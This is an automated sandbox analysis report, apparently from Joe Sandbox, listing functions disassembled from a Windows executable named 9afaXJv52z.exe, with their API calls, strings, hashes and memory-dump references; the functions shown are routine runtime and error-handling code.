Instruction ID: b5fcd9c3a30d79e24377d38ca9087c7a465e936eb641f9834e608448c0076b1e
Opcode Fuzzy Hash: aedd94d896d3770322b3bc916a57fa4c811986127e2200c50fe109d0e77cca38
Instruction Fuzzy Hash: 53315236A19682C5EB20EB61E8952F97360FF89BA4F400139EA4DCBB55DF3CD905C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B29E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6850B87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B2A14

Part of subcall function 00007FF6850B8560: GetLastError.KERNEL32(00000000,00007FF6850B2A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B8587
Part of subcall function 00007FF6850B8560: FormatMessageW.KERNEL32 ref: 00007FF6850B85B6

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

MessageBoxW.USER32 ref: 00007FF6850B2AF0
MessageBoxA.USER32 ref: 00007FF6850B2B0C

Strings

Fatal error detected, xrefs: 00007FF6850B2AC6, 00007FF6850B2AFE
%s%s: %s, xrefs: 00007FF6850B2A6B

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction ID: ef1dc084916651b0a197055d87be9f3d982664068e5ef4e484cf0e0bca62c193
Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction Fuzzy Hash: 99317672628686C2E630EB10E4916DA7364FF84FD4F80513AEA8D93A59DF3CDB05CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CA018 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6850CA03D
GetProcAddress.KERNEL32 ref: 00007FF6850CA053
FreeLibrary.KERNEL32 ref: 00007FF6850CA07A

Strings

CorExitProcess, xrefs: 00007FF6850CA04C
mscoree.dll, xrefs: 00007FF6850CA034

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction ID: 4df60eaa4414e47f333c5c1761ccae27dd5a44d30944c7b82fade24ae0205f27
Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction Fuzzy Hash: 97F04F65A09706C1EA108B24E4443795360BF49FB1F64033DC96EC62E4CF2CEC84C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D9C40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF6850D9C68
_set_statfp.LIBCMT ref: 00007FF6850D9C83
_set_statfp.LIBCMT ref: 00007FF6850D9C9F
_set_statfp.LIBCMT ref: 00007FF6850D9CDB

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: 24070743dc32bbb5f0972cccc53ddef9ca9d9b25f6aeac221ecaf782744088f0
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: C1115E72E1CA0BC5F66411A8E94637914837F99B70E082B3CF96E967DACF2DAC40C204

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CB950 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CB96F
FlsSetValue.KERNEL32(?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CB98E
FlsSetValue.KERNEL32(?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CB9B6
FlsSetValue.KERNEL32(?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CB9C7
FlsSetValue.KERNEL32(?,?,?,00007FF6850CAB67,?,?,00000000,00007FF6850CAE02,?,?,?,?,?,00007FF6850C30CC), ref: 00007FF6850CB9D8

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
Instruction ID: d0ed8826c2756b4e29f37f50ed78ffa2e481144c524b085a154a578c3ff7e419
Opcode Fuzzy Hash: 4fc6ccaa14371e387e5c22fb95057e46c3ade10dd54edcd3ce0e48e5b46d1de5
Instruction Fuzzy Hash: 51114F20B0C643C1FA589766A9911796241BF46FB0F58433CE97DCA7D6DF2CED42C621

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CB7E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF6850CB7F5
FlsSetValue.KERNEL32 ref: 00007FF6850CB814
FlsSetValue.KERNEL32 ref: 00007FF6850CB83C
FlsSetValue.KERNEL32 ref: 00007FF6850CB84D
FlsSetValue.KERNEL32 ref: 00007FF6850CB85E

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
Instruction ID: 99626acdffd1eec957fd0faff3b1b4df6cd06ebb70f00dc5a29f41e1cfa5c43f
Opcode Fuzzy Hash: 64fe73475c7f3c5e3ff0e30dd8e21900901c314ca9004384e47b330d372873f3
Instruction Fuzzy Hash: 8C119620E09207C2F968A675585517A12417F46F70E98573CDA3ECA3D3DF2CBD45C622

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C64B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C64F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C661A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C66D0

Strings

verbose, xrefs: 00007FF6850C64C4

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction ID: 0faf787d9d181f4fbb52ed1e2b0344b805da994238664a8e7376e969aae211ce
Opcode Fuzzy Hash: ad3fface7d4b2ce3aa9510f497705372120eac90acd968bb25d3a192cbea6c12
Instruction Fuzzy Hash: 1D919C22E08A46C5EB318A29D45037D37A0BF46FA8F94463ADA5E863D5DF3DEC45C321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D05A8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D0887

Part of subcall function 00007FF6850D69C4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D69E1

Strings

UTF-16LEUNICODE, xrefs: 00007FF6850D0825
ccs, xrefs: 00007FF6850D07C2
UTF-8, xrefs: 00007FF6850D0806

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction ID: d868b1cd7472099957381f6c57c34865e3dca8e98a499fe984f7d66ceb245152
Opcode Fuzzy Hash: 1a54e2a2b62d6839c513ace75884cea9e48035532f3c44be9a18c4b4dcf643eb
Instruction Fuzzy Hash: 6181B236E08602C5F6A45F26C22427836A0BF51FA4F75823DDA4EDB295EF2DED01DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BEFD8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6850BF024
_CallSETranslator.LIBVCRUNTIME ref: 00007FF6850BF073

Strings

RCC, xrefs: 00007FF6850BF041
MOC, xrefs: 00007FF6850BF038

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction ID: 6cf2b010ae27b19bf0221a568fd4f3ab71ee139d429feb69cdf69beaf852e108
Opcode Fuzzy Hash: 37ce56c1d967fba8f41503b71a699ba51a6fbc199d8f022e66d4a2d7a57293db
Instruction Fuzzy Hash: 8E617B33A18B45CAE710AF65D4803AD77A0FB48BA8F044629EF8D57BA5DF38E945C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850BF334 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6850BF35C
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF6850BF444

Strings

csm, xrefs: 00007FF6850BF37E
csm, xrefs: 00007FF6850BF496

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction ID: 532a48171dc5772127cb10d0cf290ca6c31917a7dacff014a0001729198e50c4
Opcode Fuzzy Hash: 80d5d2ed719ea387a00afc8e5c38e85421d4b0de11d669121429011e6c75d481
Instruction Fuzzy Hash: E0516C32908242C6EB64AF2595C436976A0BF54FA4F144139DB9DC7B96CF3CE990C702

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B2890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850B8AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6850B2ABB), ref: 00007FF6850B8B1A

MessageBoxW.USER32 ref: 00007FF6850B299B
MessageBoxA.USER32 ref: 00007FF6850B29B7

Strings

Fatal error detected, xrefs: 00007FF6850B2971, 00007FF6850B29A9
%s%s: %s, xrefs: 00007FF6850B2916

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 1878133881-2410924014
Opcode ID: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction ID: de67166e78390ab4d9fcf38c6e55620c49189bc1b4adf9f77ccb9f943c0224ec
Opcode Fuzzy Hash: e8e3c511841a02337865787422672dc7088828a74b651abb3bad42d47e8d3758
Instruction Fuzzy Hash: 7C314872628686D1E630EB10E4916DA6364FF84FD4F80513AEA8D87A99DF3CDB05CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B3EC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,00007FF6850B39EA), ref: 00007FF6850B3EF1

Part of subcall function 00007FF6850B29E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6850B87F2,?,?,?,?,?,?,?,?,?,?,?,00007FF6850B101D), ref: 00007FF6850B2A14
Part of subcall function 00007FF6850B29E0: MessageBoxW.USER32 ref: 00007FF6850B2AF0

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF6850B3F2A
Failed to get executable path., xrefs: 00007FF6850B3EFB
GetModuleFileNameW, xrefs: 00007FF6850B3F02

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorFileLastMessageModuleName
String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
API String ID: 2581892565-1977442011
Opcode ID: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction ID: ad2cef756ddb0ce6137ce1d414128928137f75e41a56d6f8ec51e1844d54c18e
Opcode Fuzzy Hash: 227eff0bc0a0d80c8f8e7ebb06cca3199172163df290dc8daf9e61b6ec9130a6
Instruction Fuzzy Hash: 19014461B2D643C1FE60F720E8963B51761BF58FE4F800539D94DC6296EE1CE945C706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CCB60 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6850CCBDF
WriteFile.KERNEL32 ref: 00007FF6850CCEA7
WriteFile.KERNEL32 ref: 00007FF6850CCEED
GetLastError.KERNEL32 ref: 00007FF6850CCFA3

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction ID: 55efd0d8ad8a05f4ec51156e450b5257f5cea2c786ada4ab6314bdadd5ca0d9a
Opcode Fuzzy Hash: 9513e67bca3e1584d4e6c680d6c879e0cc2bad3dff94493eb0c92e1d92f8606a
Instruction Fuzzy Hash: CAD1C072B18A81C9E711CF65D4402AC3BB1FF46BA8B144239DE6D97B99DF38D806C350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850B2330 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6850B2364
SetWindowLongPtrW.USER32 ref: 00007FF6850B2386
GetWindowLongPtrW.USER32 ref: 00007FF6850B23B0
InvalidateRect.USER32 ref: 00007FF6850B23D0

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction ID: a0941315737c83b4a2d4373041eecb3542806cf3bcb4789ea2f79497c32c8071
Opcode Fuzzy Hash: ecac84c754e5eddc26d74cef75c58701df5fcac281216c238072f9f7c8686c02
Instruction Fuzzy Hash: C9118621E08143C2FA65AB69F5842B91291FF89FA0F848238DE4986B9DCD2CDCC1D601

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850D628C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6850D1DD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6850D1E03

_get_daylight.LIBCMT ref: 00007FF6850D63A4
_get_daylight.LIBCMT ref: 00007FF6850D63B5

Strings

?, xrefs: 00007FF6850D6335

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction ID: 9da76f9dd078476b9a17b900f4bf466808865ed6d250f12fc4022a538a6507e0
Opcode Fuzzy Hash: 17ef38b8e319b62c4683ba5c2bd00e0c19603a4e78082bfdfdcdf9d98f8fed33
Instruction Fuzzy Hash: 3C41D022E0868282FB648B25A45137A6660FF81FB4F544339FE9D86AD9DF3CD881C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850C95A4 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6850C95D6

Part of subcall function 00007FF6850CAF0C: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF22
Part of subcall function 00007FF6850CAF0C: GetLastError.KERNEL32(?,?,?,00007FF6850D3392,?,?,?,00007FF6850D33CF,?,?,00000000,00007FF6850D3895,?,?,00000000,00007FF6850D37C7), ref: 00007FF6850CAF2C

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6850BBFE5), ref: 00007FF6850C95F4

Strings

C:\Users\user\Desktop\9afaXJv52z.exe, xrefs: 00007FF6850C95E2

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590487177.00007FF6850F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590547144.00007FF6850F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6850b0000_9afaXJv52z.jbxd

Similarity

API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\9afaXJv52z.exe
API String ID: 2553983749-1470022055
Opcode ID: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction ID: 2410237d2b3c317fe4fefeadcb34f1755d3ea04914919c686f80a66a77c78044
Opcode Fuzzy Hash: 72bea691884ec75b0bcc04dadd89fc5e2ba2839e886db2c4c4036b89f533388c
Instruction Fuzzy Hash: 3E416C76A09B02C6EB54DF6295510BC27A5FF86FA4B544439E94E87B85DF3CEC81C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6850CD1F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6850CD30F
GetLastError.KERNEL32 ref: 00007FF6850CD331

Strings

U, xrefs: 00007FF6850CD2BB

Memory Dump Source

Source File: 00000000.00000002.1590412828.00007FF6850B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6850B0000, based on PE: true

Associated: 00000000.00000002.1590381182.00007FF6850B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590452258.00007FF6850DB000.00000002.00000001.01000000.00000003.sdmpDownload File
